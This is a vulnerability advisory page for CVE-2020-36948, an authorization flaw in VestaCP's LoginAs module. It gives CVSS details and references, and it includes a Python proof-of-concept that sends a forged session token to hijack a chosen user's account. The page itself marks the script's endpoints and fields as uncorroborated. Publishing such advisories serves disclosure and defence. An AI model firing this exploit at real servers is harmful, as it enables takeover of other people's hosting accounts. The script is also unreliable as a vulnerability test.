Security Vulnerability Report
CVE-2020-36948 CVSS 9.8 CRITICAL

CVE-2020-36948

Published: 2026-01-27 16:16:12
Last Modified: 2026-04-15 00:35:42

Description

VestaCP 0.9.8-26 contains a session token vulnerability in the LoginAs module that allows remote attackers to manipulate authentication tokens. Attackers can exploit insufficient token validation to access user accounts and perform unauthorized login requests without proper administrative permissions. The record classifies the weakness as CWE-863 (Incorrect Authorization): the check on who may use LoginAs to reach another account is insufficient, so the impact is account takeover of the targeted user rather than a crash or data corruption.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Caveat: this is a secondary (non-NVD) v3.1 assessment and it assumes no prior privileges (PR:N). The same record also carries a secondary CVSS 4.0 vector, CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N, scored 8.7 HIGH, which assumes the attacker already holds a low-privilege account (PR:L). The record's status is "Deferred", so NVD has not reconciled the two; treat "unauthenticated" versus "authenticated as any panel user" as unconfirmed when prioritising.

Configurations (Affected Products)

No configuration data available.

VestaCP 0.9.8-26 and earlier (per this page's note; the NVD description itself names only 0.9.8-26, and no CPE configuration has been published for this record).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note that the endpoint paths (`/ajax/login-as-user/`, `/api/v1/check`), the `token`/`action` form fields and the `"success"` response marker in the listing are not corroborated by the advisory text on this page; confirm them against the referenced Exploit-DB 49219 and Vulnerability-Lab entry 2240 before relying on the script, and treat a negative result as inconclusive.
python
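import requests

# CVE-2020-36948 PoC - VestaCP LoginAs Session Token Vulnerability
# Target: VestaCP <= 0.9.8-26 (the NVD description names 0.9.8-26; CWE-863)
#
# NOTE(review): the endpoint paths, the "token"/"action" form fields and the
# "success" response marker used below are not corroborated by the NVD
# advisory text. Confirm them against Exploit-DB 49219 / Vulnerability-Lab
# entry 2240 before treating a negative result as "not vulnerable".

# The token travels in cleartext over http://; use https:// where the panel
# serves TLS, and verify the certificate rather than disabling verification.
TARGET_URL = "http://target-vestacp-server:8083"
TARGET_USER = "target_username"
ATTACKER_TOKEN = "malicious_session_token"

# Placeholder values shipped with the PoC. Running against a real host with
# any of them still set is a guaranteed false negative, so we refuse to.
_PLACEHOLDERS = frozenset({
    "http://target-vestacp-server:8083",
    "target_username",
    "malicious_session_token",
})

# One bound for every request. The original POST had no timeout and could
# hang forever on a host that accepts the TCP connection but never answers.
REQUEST_TIMEOUT = 10


def _ensure_configured() -> None:
    """Refuse to run with the shipped placeholder target, user or token.

    Raises:
        ValueError: if TARGET_URL, TARGET_USER or ATTACKER_TOKEN is still the
            placeholder value from the listing.
    """
    unset = [
        name
        for name, value in (
            ("TARGET_URL", TARGET_URL),
            ("TARGET_USER", TARGET_USER),
            ("ATTACKER_TOKEN", ATTACKER_TOKEN),
        )
        if value in _PLACEHOLDERS
    ]
    if unset:
        raise ValueError(f"placeholder value(s) not replaced: {', '.join(unset)}")


def _looks_successful(status_code: int, body: str) -> bool:
    """Success heuristic inherited from the original PoC.

    HTTP 200 with the substring "success" anywhere in the body. This is weak
    on purpose (a 200 error page that merely contains the word "success"
    satisfies it) and is kept so results stay comparable with the original;
    tighten it once the real response format has been confirmed.
    """
    return status_code == 200 and "success" in body


def exploit_loginas_vulnerability() -> bool:
    """Send one LoginAs request for TARGET_USER using ATTACKER_TOKEN.

    The attacker-controlled token is presented both as the PHPSESSID cookie
    and as the ``token`` form field; the claim behind CVE-2020-36948 is that
    the LoginAs module does not validate it adequately (CWE-863). This PoC
    does not obtain a token itself - ATTACKER_TOKEN must be supplied.

    Returns:
        True when the server answered 200 with "success" in the body (see
        _looks_successful for how weak that marker is), False otherwise.

    Raises:
        ValueError: placeholder configuration (see _ensure_configured).
        requests.RequestException: network, TLS or timeout failure. Left to
            the caller on purpose so an unreachable host is not reported as
            "not vulnerable".
    """
    _ensure_configured()

    loginas_url = f"{TARGET_URL}/ajax/login-as-user/"
    headers = {"X-Requested-With": "XMLHttpRequest"}
    # Same "Cookie: PHPSESSID=<token>" the original built by hand, sent via
    # the cookie jar instead of a raw header.
    cookies = {"PHPSESSID": ATTACKER_TOKEN}
    payload = {
        "user": TARGET_USER,
        "token": ATTACKER_TOKEN,
        "action": "loginas",
    }

    with requests.Session() as session:
        response = session.post(
            loginas_url,
            data=payload,
            headers=headers,
            cookies=cookies,
            timeout=REQUEST_TIMEOUT,
        )
        if _looks_successful(response.status_code, response.text):
            print(f"[!] Successfully hijacked user: {TARGET_USER}")
            print(f"[*] Session cookie: {response.cookies.get_dict()}")
            return True
    return False


def check_vulnerability() -> bool:
    """Fingerprint the target. This is detection, not a vulnerability test.

    Matches the string "vestacp" anywhere in the response body, so any page
    that mentions the product (a 404, a login form, a newer patched build)
    counts. True here only means "worth trying exploit_loginas_vulnerability()".

    Returns:
        True if the body contains "vestacp" (case-insensitive); False if it
        does not or if the request failed. Failures are reported instead of
        being silently swallowed as the original bare ``except: pass`` did.
    """
    check_url = f"{TARGET_URL}/api/v1/check"
    try:
        response = requests.get(check_url, timeout=REQUEST_TIMEOUT)
    except requests.RequestException as exc:
        print(f"[-] Request to {check_url} failed: {exc}")
        return False
    if "vestacp" in response.text.lower():
        print("[*] VestaCP detected - may be vulnerable")
        return True
    return False


def main() -> None:
    """Entry point: banner plus fingerprint only.

    The exploit is deliberately not fired from here (the original did not
    either). Call exploit_loginas_vulnerability() explicitly once the target,
    user and token have been set and testing is authorised.
    """
    print("CVE-2020-36948 - VestaCP LoginAs Session Token Bypass")
    print("=" * 60)
    check_vulnerability()


if __name__ == "__main__":
    main()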

References

The URLs below are taken from the record's reference list (the NVD sources and the 134c704f-9b21-4f2e-91b3-4a467353bcc0 CNA entry cite the same three advisories):

- https://vestacp.com/ (vendor site)
- https://www.exploit-db.com/exploits/49219 (Exploit-DB entry for the LoginAs issue)
- https://www.vulncheck.com/advisories/vestacp-loginas-insufficient-session-validation (VulnCheck advisory)
- https://www.vulnerability-lab.com/get_content.php?id=2240 (original Vulnerability-Lab disclosure)
- https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. (researcher profile)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-36948", "sourceIdentifier": "[email protected]", "published": "2026-01-27T16:16:12.213", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "VestaCP 0.9.8-26 contains a session token vulnerability in the LoginAs module that allows remote attackers to manipulate authentication tokens. Attackers can exploit insufficient token validation to access user accounts and perform unauthorized login requests without proper administrative permissions."}, {"lang": "es", "value": "VestaCP 0.9.8-26 contiene una vulnerabilidad de token de sesión en el módulo LoginAs que permite a atacantes remotos manipular tokens de autenticación. Los atacantes pueden explotar la validación insuficiente de tokens para acceder a cuentas de usuario y realizar solicitudes de inicio de sesión no autorizadas sin los permisos administrativos adecuados."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", 
"modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://vestacp.com/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49219", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/vestacp-loginas-insufficient-session-validation", "source": "[email protected]"}, {"url": "https://www.vulnerability-lab.com/get_content.php?id=2240", "source": "[email protected]"}, {"url": "https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49219", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}, {"url": "https://www.vulnerability-lab.com/get_content.php?id=2240", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}, {"url": "https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}